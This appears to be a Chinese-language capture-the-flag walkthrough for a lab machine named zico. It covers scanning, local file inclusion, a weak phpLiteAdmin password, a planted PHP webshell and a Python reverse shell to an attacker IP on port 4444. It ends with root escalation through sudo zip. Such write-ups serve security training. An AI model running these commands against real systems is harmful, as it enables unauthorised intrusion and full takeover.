ip地址扫描
端口扫描
访问80端口
点击后发现如下url
测试是否存在文件包含漏洞
尝试显示它的/etc/passwd,发现显示,说明存在文件包含漏洞
目录扫描
http://192.168.237.163/css/
http://192.168.237.163/dbadmin/
http://192.168.237.163/img/
http://192.168.237.163/js/
发现四个目录
依次进行访问
访问/css/出现如下页面
访问/dbadmin出现如下页面
点击php文件
发现密码输入框
剩余两个页面访问之后都是图片或者js文件,只能从这儿突破
尝试弱口令admin
成功登录
发现是数据库管理系统
点击浏览,发现用户名及密码
将密码进行MD5解密
尝试ssh连接,失败
kali查询phpliteadmin有没有漏洞
发现存在远程php代码注入漏洞
在页面中创建一个新的数据库,创建新表,表名为b
创建字段,默认值为一句话木马
创建成功
显示shell.php路径
使用上面发现的文件包含,访问创建的数据库
使用上面发现的文件包含,访问创建的数据库
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.237.131”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
利用python反弹shell
kali监听,反弹shell
利用python3进入交互式命令
python -c ‘import pty;pty.spawn(“/bin/bash”)’
发现zico用户的密码
zico@zico:~$ touch a
zico@zico:~$ sudo zip a.zip a -T --unzip-command="sh -c /bin/bash"
sudo zip a.zip a -T --unzip-command="sh -c /bin/bash"
adding: a (stored 0%)
root@zico:~#
zip提权
在root目录下,读取flag.txt